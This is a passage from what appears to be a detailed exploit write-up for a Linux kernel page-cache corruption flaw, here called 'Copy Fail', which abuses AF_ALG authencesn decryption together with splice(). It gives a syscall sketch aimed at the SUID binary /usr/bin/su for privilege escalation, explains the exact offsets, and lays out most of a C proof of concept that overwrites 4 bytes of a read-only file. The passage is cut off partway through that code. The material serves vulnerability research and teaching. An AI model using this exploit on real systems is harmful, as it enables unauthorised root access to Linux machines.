▼
preserved TX tag entry
│
▼
file-backed page-cache pageThis is the core Copy Fail primitive: a 4-byte attacker-controlled value is written through the AEAD destination scatterlist into a page-cache-backed entry.
The important point is that userspace never performs a normal write() to the target file. The file page is first imported through splice(), then carried into the AF_ALG TX scatterlist, and finally overwritten by the kernel-side authencesn scratch write.
To achieve write-what-where, we need to understand the syscall shape below which is the userspace way to arrange those kernel states.
4.3.6 Syscall-level Primitive
At the syscall level, the primitive is not a normal file write. Userspace only arranges two things:
- the 4-byte value to write, staged through
AAD[4:8] - the file-backed target page, staged through
splice()
Then it triggers the kernel-side decrypt path.
A sketch for the exploit workflow:
/*
* This is a syscall-level sketch, not a complete standalone exploit.
* Key setup, authsize setup, IV/control messages, exact offsets, and
* error handling are intentionally collapsed so primitive shape stays visible.
*/
/* 1. Open the AF_ALG AEAD transform. */
int tfm_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))",
};
bind(tfm_fd, (struct sockaddr *)&sa, sizeof(sa));
/*
* 2. Configure key/authsize, then accept the operation socket.
*
* setsockopt(tfm_fd, SOL_ALG, ALG_SET_KEY, ...);
* setsockopt(tfm_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, ...);
*/
int op_fd = accept(tfm_fd, NULL, NULL);
/*
* Victim target:
*
* The first splice selects the target file-backed page that we want
* to carry into the pipe, and later into the AF_ALG TX scatterlist.
*/
char *victim = "/usr/bin/su";
int target_file_fd = open(victim, O_RDONLY);
off_t target_file_offset = 0x1234; /* victim file/page selection offset */
size_t splice_len = 0x1000; /* enough bytes for the planned TX layout */
int pipe_fds[2];
pipe(pipe_fds);
/*
* 3. Queue attacker-controlled AAD.
*
* AAD[4:8] becomes seqno_lo.
* authencesn later writes these 4 bytes through:
*
* scatterwalk_map_and_copy(tmp + 1,
* dst,
* assoclen + cryptlen,
* 4,
* 1);
*/
uint8_t write_value[4] = { 'P', 'W', 'N', '!' };
uint8_t aad[8];
memset(aad, 'A', 4); /* AAD[0:4] */
memcpy(aad + 4, write_value, 4); /* AAD[4:8] = seqno_lo */
struct iovec aad_iov = {
.iov_base = aad,
.iov_len = sizeof(aad),
};
struct msghdr aad_msg = {
.msg_iov = &aad_iov,
.msg_iovlen = 1,
.msg_control = cmsg_buf, /* ALG_SET_OP / ALG_SET_AEAD_ASSOCLEN / IV */
.msg_controllen = cmsg_len,
};
/*
* MSG_MORE keeps the AF_ALG request open so more input can be appended.
*/
sendmsg(op_fd, &aad_msg, MSG_MORE);
/*
* 4. Splice the target file page into a pipe.
*
* Kernel-side effect:
*
* target file page cache
* -> pipe_buffer
*/
splice(
target_file_fd,
&target_file_offset,
pipe_fds[1],
NULL,
splice_len,
0
);
/*
* 5. Splice the pipe into the AF_ALG operation socket.
*
* Kernel-side effect:
*
* pipe_buffer
* -> bio_vec
* -> msg_iter marked MSG_SPLICE_PAGES
* -> AF_ALG TX scatterlist
*/
splice(
pipe_fds[0],
NULL,
op_fd,
NULL,
splice_len,
0
);
/*
* 6. Trigger decrypt.
*
* rx_buf is the normal caller-provided receive buffer.
*
* _aead_recvmsg() builds:
*
* RX output head -> preserved TX tag tail
*
* Then authencesn performs the destination-side scratch write.
*/
recv(op_fd, rx_buf, rx_len, 0);The exact offset choreography is handled later (see 5.2). For now, the important mapping is:
target_file_offset→ selects file-backed page entering pipeAF_ALGdecrypt layout → positions that page inside the preserved TX tag tailassoclen + cryptlen→ makes the authencesn scratch write land at the RX/TX chain boundary
Read as one execution stream:
controlled AAD[4:8]
│
│ sendmsg()
▼
AF_ALG request input
│
│ splice(file -> pipe)
▼
pipe references target page-cache page
│
│ splice(pipe -> AF_ALG socket)
▼
AF_ALG TX scatterlist contains page-backed entry
│
│ recv()
▼
_aead_recvmsg() chains TX tag tail after RX output
│
│ authencesn decrypt
▼
AAD[4:8] written at dst @ assoclen + cryptlenThe decrypt may fail authentication, but that failure is not a rollback point. The scratch write has already happened.
4.3.7 Execution from Corrupted Cache
After the overwrite, the target file's page-cache page contains modified bytes. For an executable file, later execve() may consume those cached bytes as instruction data.
For a root-owned SUID target, that means:
4-byte page-cache overwrite
│
▼
corrupted executable page
│
▼
later execve()
│
▼
modified code runs in SUID program contextAt this point, the remaining exploit work is to place attacker-controlled patch bytes into the victim file's page-cache page.
In Chapter 7, we will finally turn this primitive into working exploit implementations across different languages — right after a quick PoC to understand how to construct an exploit (Chapter 5) with some runtime debugging evidence demonstration (Chapter 6).
5 PoC Walkthrough
Before moving to the final exploit, we should first prove the primitive against a harmless lab file. The goal here is not privilege escalation yet. It is simpler:
can a failed
authencesn()decrypt request change 4 bytes in the page cache of a file that userspace opened read-only?
5.1 Lab Target
Create a small read-only file with an obvious marker at the offset we want to corrupt:
python3 - <<'PY'
from pathlib import Path
p = Path("./target.bin").resolve()
data = bytearray(b"A" * 0x3000)
data[0x1234:0x1238] = b"ORIG"
p.write_bytes(data)
p.chmod(0o444)
marker = p.read_bytes()[0x1234:0x1238]
print(f"[+] wrote {p}")
print("[+] marker @ 0x1234:", marker)
PY
ls -li ./target.bin
xxd -g1 -s 0x1220 -l 0x40 ./target.binThe target is a normal regular file with size 0x3000 and read-only permissions. The terminal capture below still shows an older run that used ~/lab/copyfail/target.bin; the PoCs and verification commands in this chapter now use ./target.bin so they can be run from any working directory:
axura@pwnlab:~$ ls -li ~/lab/copyfail/target.bin 1622290 -r--r--r-- 1 axura axura 12288 May 15 23:53 /home/axura/lab/copyfail/target.bin axura@pwnlab:~$ stat ~/lab/copyfail/target.bin File: /home/axura/lab/copyfail/target.bin Size: 12288 Blocks: 24 IO Block: 4096 regular file Device: 8,2 Inode: 1622290 Links: 1 Access: (0444/-r--r--r--) Uid: ( 1000/ axura) Gid: ( 1000/ axura) Access: 2026-05-15 23:53:22.301189474 +0800 Modify: 2026-05-15 23:53:22.301129036 +0800 Change: 2026-05-15 23:53:22.301129036 +0800 Birth: 2026-05-15 23:53:22.300816681 +0800
The marker strin, "ORIG" (hex: 4f 52 49 47), we care about sits at file offset 0x1234:
axura@pwnlab:~$ xxd -g1 -s 0x1220 -l 0x40 ~/lab/copyfail/target.bin 00001220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001230: 41 41 41 41 4f 52 49 47 41 41 41 41 41 41 41 41 AAAAORIGAAAAAAAA 00001240: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001250: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
The file is read-only from userspace, but that does not mean its bytes cannot be cached. Once the file is read or spliced, the kernel may keep its contents in the page cache. The rest of the lab uses this marker to check whether the cached file page changes.
5.2 Offset And Layout Choreography
The PoC succeeds only if the file bytes we want to change are positioned exactly where authencesn() performs its 4-byte scratch write. This section reduces the offset problem to one layout rule:
Target marker must sit at the beginning of the AEAD tag region
5.2.1 Scratch Write Boundary
The vulnerable write uses the destination scatterlist (the dst argument of scatterwalk_map_and_copy() triggered during the esn decrypt path, introduced in 3.4.4) at logical offset:
assoclen + cryptlenIn the authencesn() decrypt path, cryptlen is first reduced by the authentication tag size, so at the moment of the scratch write it means ciphertext length only. Therefore assoclen + cryptlen points to the boundary after AAD || ciphertext, which is also the beginning of the preserved tag tail:
TX input: AAD || ciphertext || tag
RX output: AAD || plaintext
^
|
scratch write starts hereSo the target file bytes must occupy the start of the tag region inside the spliced file segment.
5.2.2 Ciphertext And Tag Window
The selected AEAD transform is:
authencesn(hmac(sha256),cbc(aes))For AEAD decryption, the logical input is:
AAD || ciphertext || tagThe ciphertext part is handled by cbc(aes). AES-CBC works on 16-byte blocks, so the smallest convenient ciphertext/filler region for this lab is one block:
ciphertext/filler = 0x10 bytesThe tag size is separate from CBC. In this PoC we configure a 16-byte AEAD tag:
authsize = 0x10That gives a simple 0x20-byte spliced window:
spliced file segment
════════════════════════════════════════════════════
┌────────────────────────┬────────────────────────┐
│ ciphertext/filler │ tag region │
│ 0x10 bytes │ 0x10 bytes │
└────────────────────────┴────────────────────────┘
0 0x10 0x20
▲
│
overwrite starts hereThis layout is not trying to produce a valid CBC ciphertext. Authentication may still fail. The only requirement for the primitive is that the file-backed bytes occupy the tag-start boundary where authencesn() later writes AAD[4:8].
Visually:
required placement
════════════════════════════════════════════════════
spliced file segment
┌────────────────────────┬──────┬─────────────────┐
│ ciphertext/filler │ ORIG │ remaining tag │
│ validity not required │ 4 B │ bytes │
└────────────────────────┴──────┴─────────────────┘
▲
│
tag start / overwrite start
authencesn overwrites AAD[4:8] here5.2.3 Final Lab Offsets
Before plugging in the numbers, keep the variables straight:
| Variable | Meaning | Lab value | |
|---|---|---|---|
overwrite_file_offset | File offset where the 4-byte overwrite should land | 0x1234 | |
authsize | AEAD authentication tag length | 0x10 | |
splice_len | Number of bytes spliced from the target file | 0x20 | |
splice_file_offset | File offset where the spliced range starts | calculated |
The "ORGIN" marker string is at:
overwrite_file_offset = 0x1234Because the overwrite starts at the beginning of the tag region, the tag must begin at 0x1234. With a 0x10-byte ciphertext/filler block before the tag, the spliced range starts one block earlier:
splice_file_offset = overwrite_file_offset - 0x10Using the general formula:
overwrite_file_offset = splice_file_offset + (splice_len - authsize)
splice_file_offset = overwrite_file_offset - (splice_len - authsize)we get:
overwrite_file_offset = 0x1234
authsize = 0x10
splice_len = 0x20
splice_file_offset = 0x1234 - (0x20 - 0x10)
= 0x1224Visually:
spliced file range
══════════════════════════════════════════════════════════════
splice_file_offset overwrite_file_offset
0x1224 0x1234
│ │
▼ ▼
┌────────────────────────┬──────┬─────────────────────┐
│ ciphertext/filler │ ORIG │ remaining tag bytes │
│ 16 bytes │ 4 B │ 12 bytes │
└────────────────────────┴──────┴─────────────────────┘
▲
│
tag start / overwrite startAfter the scratch write, the first 4 bytes of the tag region should become the controlled value staged in AAD[4:8]:
before: ORIG
after : PWN!5.3 Primitive Shape
At this point, the lab offsets are fixed:
write value target : target.bin[0x1234:0x1238]
splice start : target.bin + 0x1224
splice length : 0x20
auth tag size : 0x10So the remaining job is to express that layout through the syscall interface:
AF_ALGsetup → selectauthencesn(hmac(sha256),cbc(aes))sendmsg()→ stageAAD[4:8]as the 4-byte value to writesplice()→ stage the target file page into theAF_ALGTX pathrecv()→ trigger decrypt and the authencesn scratch write
The following subsections build that PoC from the bottom up: first the UAPI constants, then the transform configuration, then the per-request metadata, and finally the syscall sequence.
5.3.1 UAPI Constants
Before the PoC starts calling socket(), bind(), setsockopt(), and sendmsg(), we need a few constants shared between userspace and the kernel.
UAPI means userspace API. In Linux, UAPI headers define the numbers and structures that userspace programs pass into syscalls. The kernel and userspace must agree on these values. For example, when userspace calls:
socket(AF_ALG, SOCK_SEQPACKET, 0);the value of AF_ALG must match the kernel's socket family number for the crypto socket interface.
Some libc/kernel header combinations may not expose every AF_ALG macro consistently, so in this PoC we define the needed values directly. These are not magic numbers; they come from Linux UAPI headers.
The socket family and socket-option namespace come from AF_ALG and SOL_ALG:
/* include/linux/socket.h */
#define PF_ALG 38
#define AF_ALG PF_ALG
/* include/uapi/asm-generic/socket.h */
#define SOL_ALG 279The AEAD request controls come from include/uapi/linux/if_alg.h:
/* Socket options */
#define ALG_SET_KEY 1
#define ALG_SET_IV 2
#define ALG_SET_OP 3
#define ALG_SET_AEAD_ASSOCLEN 4
#define ALG_SET_AEAD_AUTHSIZE 5
/* Operations */
#define ALG_OP_DECRYPT 0
#define ALG_OP_ENCRYPT 1So the PoC values are:
| Macro | Value | Meaning in this PoC |
|---|---|---|
AF_ALG | 38 | create a kernel crypto socket |
SOL_ALG | 279 | tell setsockopt() / control messages this is an AF_ALG option |
ALG_SET_KEY | 1 | configure the authenc key blob |
ALG_SET_IV | 2 | attach the IV to the request |
ALG_SET_OP | 3 | select encrypt/decrypt for this request |
ALG_SET_AEAD_ASSOCLEN | 4 | tell the kernel how many queued bytes are AAD |
ALG_SET_AEAD_AUTHSIZE | 5 | configure the authentication tag length |
ALG_OP_DECRYPT | 0 | force the decrypt path |
5.3.2 Transform Configuration
Before staging request bytes, the AF_ALG transform socket must be configured with the AEAD properties consumed later by _aead_recvmsg() and crypto_authenc_esn_decrypt().
For this PoC, the transform setup has two important pieces:
- an
authenc-compatible key blob forALG_SET_KEY - a 16-byte AEAD authentication tag length for
ALG_SET_AEAD_AUTHSIZE
5.3.2.1 Key Blob Layout
authencesn(hmac(sha256),cbc(aes)) is a combined AEAD construction. It uses one key for HMAC authentication and another key for AES-CBC encryption. So ALG_SET_KEY cannot pass only a raw AES key; it must pass a packed blob that tells the kernel where the AES key is inside the combined key material.
Before the kernel can run:
authencesn(hmac(sha256),cbc(aes))it needs key material for both inner algorithms:
- auth key → HMAC-SHA256
- enc key → AES-CBC
The kernel does not expect just a raw AES key for the ALG_SET_KEY payload, but to carry:
authentication key || encryption keyThe authenc parser is crypto_authenc_extractkeys():
int crypto_authenc_extractkeys(struct crypto_authenc_keys *keys,
const u8 *key, unsigned int keylen)
{
struct rtattr *rta = (void *)key;
struct crypto_authenc_key_param *param;
/* The key blob must start with a valid rtattr header. */
if (!RTA_OK(rta, keylen))
return -EINVAL;
/* The rtattr must describe authenc key parameters. */
if (rta->rta_type != CRYPTO_AUTHENC_KEYA_PARAM)
return -EINVAL;
/* Read the metadata payload: enckeylen. */
param = RTA_DATA(rta);
keys->enckeylen = be32_to_cpu(param->enckeylen);
/*
* Skip the rtattr + parameter header.
* The remaining bytes are:
*
* auth key || enc key
*/
key += RTA_ALIGN(rta->rta_len);
keylen -= RTA_ALIGN(rta->rta_len);
/* There must be at least enough bytes for the encryption key. */
if (keylen < keys->enckeylen)
return -EINVAL;
/*
* Split the remaining key bytes.
*
* authkey = all bytes before the encryption key
* enckey = last enckeylen bytes
*/
keys->authkeylen = keylen - keys->enckeylen;
keys->authkey = key;
keys->enckey = key + keys->authkeylen;
return 0;
}This means it expects a small metadata header first, followed by the authentication key and encryption key:
key blob passed to ALG_SET_KEY
════════════════════════════════════════════════════
┌──────────┬───────────────────────────┬──────────────┬───────────┐
│ rtattr │ crypto_authenc_key_param │ auth key │ enc key │
│ header │ enckeylen = 16 │ 32 bytes │ 16 bytes │
└──────────┴───────────────────────────┴──────────────┴───────────┘
│ │ │ │
│ │ │ └─ AES-CBC key
│ │ │
│ │ └─ HMAC-SHA256 key
│ │
│ └─ tells parser: last 16 bytes are enc key
│
└─ rta_type = CRYPTO_AUTHENC_KEYA_PARAMFor this PoC, we chose two simple key sizes:
HMAC-SHA256 auth key = 32 bytes
AES-CBC enc key = 16 bytesSo the raw key material is:
32-byte auth key || 16-byte AES keyThat enckeylen = 16 is an integer wrapped by struct crypto_authenc_key_param:
struct crypto_authenc_key_param {
__be32 enckeylen;
};it tells authenc where the AES key starts:
- The last 16 bytes of the key blob are the AES encryption key
- Everything before that, after the metadata header, is treated as the authentication key
So when the kernel sees 48 bytes of raw key material, it automatically computes authkeylen = 48 - 16 = 32.
That produces the payload used by this PoC:
metadata header length
════════════════════════════════════════
sizeof(struct rtattr) = 4
sizeof(struct crypto_authenc_key_param) = 4
rtattr.rta_len = RTA_LENGTH(sizeof(struct crypto_authenc_key_param))
= 4 + 4
= 8
full ALG_SET_KEY blob length
════════════════════════════════════════
┌─────────┬──────────────────────────┬──────────┬──────────┐
│ rtattr │ crypto_authenc_key_param │ auth key │ enc key │
│ 4 bytes │ 4 bytes │ 32 bytes │ 16 bytes │
└─────────┴──────────────────────────┴──────────┴──────────┘
metadata length = 4 + 4 = 8
raw key length = 32 + 16 = 48
total blob len = 8 + 48 = 56 5.3.2.2 Authentication Tag Size
The AEAD tag size is configured separately through ALG_SET_AEAD_AUTHSIZE.
The kernel-side detail is slightly non-obvious. In alg_setsockopt(), ALG_SET_AEAD_AUTHSIZE passes the option length into the family callback:
static int alg_setsockopt(struct socket *sock, int level, int optname,
sockptr_t optval, unsigned int optlen)
{
/*
* Generic socket object -> protocol socket state.
*/
struct sock *sk = sock->sk;
/*
* AF_ALG-specific socket state.
*
* This stores the selected algorithm instance and private
* transform data created earlier by bind().
*/
struct alg_sock *ask = alg_sk(sk);
/*
* AF_ALG family dispatch table.
*
* For salg_type = "aead", this points to the AEAD family callbacks,
* including setkey(), setauthsize(), accept(), etc.
*/
const struct af_alg_type *type;
...
case ALG_SET_AEAD_AUTHSIZE:
...
/*
* Non-obvious convention:
*
* optlen itself is treated as the requested auth tag size.
* The kernel does not read an integer from optval here.
*
* So userspace requests authsize = 0x10 with:
*
* setsockopt(fd, SOL_ALG,
* ALG_SET_AEAD_AUTHSIZE,
* NULL, 0x10);
*/
err = type->setauthsize(
ask->private, // AEAD transform/private state
optlen // requested auth tag size
);
break;
...
}For salg_type = "aead", type->setauthsize resolves to aead_setauthsize():
static int aead_setauthsize(void *private, unsigned int authsize)
{
struct aead_tfm *tfm = private; // the AEAD transform state from ask->private
/*
* Apply the requested tag size to the real crypto_aead object.
*
* In this PoC:
*
* authsize = 0x10
*/
return crypto_aead_setauthsize(
tfm->aead, // selected AEAD transform
authsize // authentication tag size
);
}So to request a 16-byte tag, the PoC passes 0x10 as the fourth argument to setsockopt():
unsigned int authsize = 0x10;
setsockopt(tfm_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, authsize);Notice for
ALG_SET_AEAD_AUTHSIZEused in PoC to be passed foralg_setsockopt(), the 4th argoptlenis the value, not the 3rdoptval.
That same authsize is later used to split the decrypt input:
TX input = AAD || ciphertext || tag
└── authsize bytesand it is the value subtracted in crypto_authenc_esn_decrypt():
cryptlen -= authsize;That configured 0x10 tag size is what makes the desired PoC layout:
[ 0x10-byte ciphertext/filler ][ 0x10-byte tag ]5.3.3 Request Metadata
After accept() returns the operation socket, the request is not just raw bytes. The first sendmsg() also carries AEAD metadata through control messages:
ALG_SET_OP→ select encrypt or decryptALG_SET_IV→ provide IV / nonceALG_SET_AEAD_ASSOCLEN→ tell the kernel how many queued bytes are AAD
These control messages are parsed by af_alg_cmsg_send():
case ALG_SET_IV:
/*
* IV / nonce buffer for this request.
*/
con->iv = (void *)CMSG_DATA(cmsg);
break;
case ALG_SET_OP:
/*
* Per-request operation:
*
* ALG_OP_DECRYPT = 0
* ALG_OP_ENCRYPT = 1
*/
con->op = *(u32 *)CMSG_DATA(cmsg);
break;
case ALG_SET_AEAD_ASSOCLEN:
/*
* Length of the AAD prefix inside the queued input.
*
* The first con->aead_assoclen bytes are authenticated
* but not encrypted/decrypted.
*/
con->aead_assoclen = *(u32 *)CMSG_DATA(cmsg);
break;For the PoC, the used metadata is:
operation = ALG_OP_DECRYPT (0)
assoclen = 8
IV = request IV bufferSo the kernel would interpret the queued input via _aead_recvmsg() (see 3.3.2) as the desired AEAD request buffer layout:
queued TX input
════════════════════════════════════════════════════════════
┌──────────┬──────────────────────┬──────────────────────┐
│ AAD │ ciphertext/filler │ tag │
│ 8 bytes │ 16 bytes │ 16 bytes │
└──────────┴──────────────────────┴──────────────────────┘
0 8 24 40
assoclen ctx->used5.3.4 Write Source Vs Write Target
At this point, the transform and request metadata are ready. The next thing is to keep two byte streams separate:
- write source
- attacker-controlled AAD bytes
AAD[4:8]= "PWN!"
- write target
- spliced file-backed tag region
target.bin[0x1234:0x1238]= "ORIG"
They are prepared through different paths and only meet later inside the kernel.
The normal sendmsg() path supplies the AAD:
AAD
┌────────────┬────────────┐
│ AAD[0:4] │ AAD[4:8] │
│ "AAAA" │ "PWN!" │
└────────────┴────────────┘
▲
│
attacker-controlled source value
for scratch writeThe spliced file path supplies the victim bytes:
spliced file-backed tag region
┌────────────┬─────────────────────┐
│ "ORIG" │ remaining tag bytes │
│ 4 bytes │ 12 bytes │
└────────────┴─────────────────────┘
▲
│
overwrite targetAfter _aead_recvmsg() builds the in-place decrypt request, the destination scatterlist (dst) has this logical shape:
dst logical stream
══════════════════════════════════════════════════════════════
RX output head chained TX tag entry
┌──────────┬───────────────────┐ ┌────────┬──────────────┐
│ AAD │ ciphertext/filler │---▶│ "ORIG" │ tag tail ... │
│ AAAAPWN! │ 16 bytes │ │ victim │ │
└──────────┴───────────────────┘ └────────┴──────────────┘
▲ ▲
│ │
read source for tmp[] write target after sg_next()Then authencesn() performs the ESN shuffle (see 3.4.3):
scatterwalk_map_and_copy(tmp, dst, 0, 8, 0);This reads the first 8 bytes of dst, which are the AAD bytes copied into the RX head:
tmp[0] = "AAAA"
tmp[1] = "PWN!"The later scratch write uses tmp + 1:
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);So the final value movement is:
AAD[4:8] = "PWN!"
│
▼
tmp[1]
│
▼
dst at logical offset assoclen + cryptlen
│
▼
chained TX tag entry
│
▼
target.bin page cache: "ORIG" -> "PWN!"So the input we prepare is:
- normal sendmsg input: AAD =
"AAAA" || "PWN!" - spliced file input: file range where the tag region begins at target offset
0x1234, wheretarget.bin[0x1234:0x1238]initially contains "ORIG"
As aforementioned, the decrypt output itself is not the important product here. Authentication may fail. The exploit cares that the internal authencesn() scratch write happens before the error returns.
5.3.5 Syscall Ordering
At syscall level, the PoC only needs to stage two inputs before calling recv():
1. normal AF_ALG input
sendmsg()
└─ controlled AAD
└─ AAD[4:8] = 4-byte value to write
2. spliced page-backed input
splice(file -> pipe)
└─ selected file range enters pipe buffer
splice(pipe -> AF_ALG socket)
└─ selected file range enters AF_ALG TX scatterlist
through MSG_SPLICE_PAGESThen recv() turns those staged inputs into the vulnerable decrypt layout:
recv()
└─ _aead_recvmsg()
└─ builds chained decrypt request
└─ RX output head -> preserved TX tag tail
authencesn decrypt
└─ writes AAD[4:8] at assoclen + cryptlen
└─ scatterwalk crosses into the chained TX tag entryFor the lab marker, the parameters are:
write_value = b"PWN!"
target file = "./target.bin"
target_off = 0x1234
splice_off = 0x1224
splice_len = 0x20
authsize = 0x10Now we are ready for Proof of Concept.
5.4 PoC In C
5.4.1 C PoC
The first PoC is in C since our analysis followed the kernel through C structures and syscalls. This can also be download from my repo as proof-of-concept/copyfail_poc.c:
// copyfail_poc.c
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/if_alg.h>
#include <linux/rtnetlink.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/uio.h>
#include <unistd.h>
#ifndef AF_ALG
#define AF_ALG 38
#endif
#ifndef SOL_ALG
#define SOL_ALG 279
#endif
#ifndef ALG_SET_KEY
#define ALG_SET_KEY 1
#endif
#ifndef ALG_SET_IV
#define ALG_SET_IV 2
#endif
#ifndef ALG_SET_OP
#define ALG_SET_OP 3
#endif
#ifndef ALG_SET_AEAD_ASSOCLEN
#define ALG_SET_AEAD_ASSOCLEN 4
#endif
#ifndef ALG_OP_DECRYPT
#define ALG_OP_DECRYPT 0
#endif
#ifndef ALG_SET_AEAD_AUTHSIZE
#define ALG_SET_AEAD_AUTHSIZE 5
#endif
enum {
CRYPTO_AUTHENC_KEYA_UNSPEC,
CRYPTO_AUTHENC_KEYA_PARAM,
};
struct crypto_authenc_key_param {
uint32_t enckeylen;
};
struct af_alg_iv_custom {
uint32_t ivlen;
uint8_t iv[16];
};
static void die(const char *msg)
{
if (!strcmp(msg, "bind(AF_ALG)") && errno == ENOENT) {
fprintf(stderr,
"[!] AF_ALG could not resolve authencesn(hmac(sha256),cbc(aes)).\n"
"[!] Check /proc/crypto and try: sudo modprobe authencesn\n");
}
perror(msg);
exit(EXIT_FAILURE);
}
static void print_marker(const char *label, const char *path, off_t off)
{
int fd;
uint8_t b[4];
fd = open(path, O_RDONLY);
if (fd < 0)
die("open(print marker)");
if (pread(fd, b, sizeof(b), off) != (ssize_t)sizeof(b))
die("pread(marker)");
printf("%s @ 0x%llx = %02x %02x %02x %02x (%.4s)\n",
label, (long long)off, b[0], b[1], b[2], b[3],
(const char *)b);
close(fd);
}
static void create_target_file(const char *path, off_t overwrite_off)
{
int fd;
uint8_t fill = 'A';
uint8_t marker[4] = { 'O', 'R', 'I', 'G' };
off_t i;
fd = open(path, O_CREAT | O_TRUNC | O_WRONLY, 0644);
if (fd < 0)
die("open(create target)");
for (i = 0; i < 0x3000; i++) {
if (write(fd, &fill, 1) != 1)
die("write(fill target)");
}
if (pwrite(fd, marker, sizeof(marker), overwrite_off) != (ssize_t)sizeof(marker))
die("pwrite(marker)");
/*
* Make the baseline file contents durable first. Otherwise the
* target page may still be dirty from file creation, and
* drop_caches will refuse to evict it during verification.
*/
if (fsync(fd) < 0)
die("fsync(target)");
if (fchmod(fd, 0444) < 0)
die("fchmod(target)");
close(fd);
}
static void configure_aead(int tfm_fd)
{
unsigned int authsize = 0x10;
struct {
struct rtattr rta;
struct crypto_authenc_key_param param;
uint8_t keys[32 + 16];
} keybuf = {
.rta = {
.rta_len = RTA_LENGTH(sizeof(struct crypto_authenc_key_param)),
.rta_type = CRYPTO_AUTHENC_KEYA_PARAM,
},
.param = {
.enckeylen = htonl(16),
},
};
memset(keybuf.keys, 0x41, 32);
memset(keybuf.keys + 32, 0x42, 16);
if (setsockopt(tfm_fd, SOL_ALG, ALG_SET_KEY, &keybuf, sizeof(keybuf)) < 0)
die("setsockopt(ALG_SET_KEY)");
if (setsockopt(tfm_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, authsize) < 0)
die("setsockopt(ALG_SET_AEAD_AUTHSIZE)");
printf("[+] AEAD configured: authkey=32, enckey=16, authsize=0x%x\n",
authsize);
}
static void queue_aad(int op_fd, const uint8_t write_value[4])
{
uint8_t aad[8];
uint8_t cbuf[CMSG_SPACE(sizeof(uint32_t)) +
CMSG_SPACE(sizeof(struct af_alg_iv_custom)) +
CMSG_SPACE(sizeof(uint32_t))];
struct iovec iov;
struct msghdr msg;
struct cmsghdr *cmsg;
uint32_t op = ALG_OP_DECRYPT;
uint32_t assoclen = sizeof(aad);
memset(aad, 'A', 4);
memcpy(aad + 4, write_value, 4);
iov.iov_base = aad;
iov.iov_len = sizeof(aad);
memset(&msg, 0, sizeof(msg));
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = cbuf;
msg.msg_controllen = sizeof(cbuf);
memset(cbuf, 0, sizeof(cbuf));
cmsg = CMSG_FIRSTHDR(&msg);
cmsg->cmsg_level = SOL_ALG;
cmsg->cmsg_type = ALG_SET_OP;
cmsg->cmsg_len = CMSG_LEN(sizeof(op));
memcpy(CMSG_DATA(cmsg), &op, sizeof(op));
cmsg = CMSG_NXTHDR(&msg, cmsg);
cmsg->cmsg_level = SOL_ALG;
cmsg->cmsg_type = ALG_SET_IV;
cmsg->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv_custom));
{
struct af_alg_iv_custom *iv =
(struct af_alg_iv_custom *)CMSG_DATA(cmsg);
iv->ivlen = 16;
memset(iv->iv, 0x44, sizeof(iv->iv));
}
cmsg = CMSG_NXTHDR(&msg, cmsg);
cmsg->cmsg_level = SOL_ALG;
cmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN;
cmsg->cmsg_len = CMSG_LEN(sizeof(assoclen));
memcpy(CMSG_DATA(cmsg), &assoclen, sizeof(assoclen));
if (sendmsg(op_fd, &msg, MSG_MORE) < 0)
die("sendmsg(AAD)");
printf("[+] AAD queued: assoclen=%u, AAD[4:8]=%.4s\n",
assoclen, (const char *)write_value);
}
int main(void)
{
const char *target = "./target.bin";
const off_t overwrite_off = 0x1234;
const size_t authsize = 0x10;
const size_t splice_len = 0x20;
off_t splice_off = overwrite_off - (splice_len - authsize);
uint8_t write_value[4] = { 'P', 'W', 'N', '!' };
int tfm_fd, op_fd, file_fd;
int pipefd[2];
uint8_t rx[0x1000];
printf("[+] target : %s\n", target);
printf("[+] overwrite : file offset 0x%llx\n", (long long)overwrite_off);
printf("[+] splice : offset=0x%llx len=0x%zx authsize=0x%zx\n",
(long long)splice_off, splice_len, authsize);
printf("[+] write value : %.4s\n", (const char *)write_value);
/*
* 1. Create a harmless read-only lab target.
*/
create_target_file(target, overwrite_off);
print_marker("[+] marker before", target, overwrite_off);
/*
* 2. Open AF_ALG transform socket.
*/
tfm_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (tfm_fd < 0)
die("socket(AF_ALG)");
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))",
};
if (bind(tfm_fd, (struct sockaddr *)&sa, sizeof(sa)) < 0)
die("bind(AF_ALG)");
printf("[+] bound AF_ALG: type=aead name=authencesn(hmac(sha256),cbc(aes))\n");
/*
* 3. Configure transform, then accept operation socket.
*/
configure_aead(tfm_fd);
op_fd = accept(tfm_fd, NULL, NULL);
if (op_fd < 0)
die("accept(AF_ALG)");
printf("[+] accepted operation socket: fd=%d\n", op_fd);
/*
* 4. Queue attacker-controlled AAD.
* AAD[4:8] becomes seqno_lo, the 4-byte value to write.
*/
queue_aad(op_fd, write_value);
/*
* 5. Splice target file bytes into a pipe.
* The selected range is [0x1224, 0x1244), so the tag region
* begins at 0x1234.
*/
file_fd = open(target, O_RDONLY);
if (file_fd < 0)
die("open(target)");
if (pipe(pipefd) < 0)
die("pipe");
if (splice(file_fd, &splice_off, pipefd[1], NULL, splice_len, 0) < 0)
die("splice(file -> pipe)");
printf("[+] splice(file -> pipe): 0x%zx bytes from file offset 0x%llx\n",
splice_len, (long long)(overwrite_off - (splice_len - authsize)));
/*
* 6. Splice the pipe into the AF_ALG operation socket.
* Kernel-side: pipe_buffer -> bio_vec -> MSG_SPLICE_PAGES
* -> AF_ALG TX scatterlist.
*/
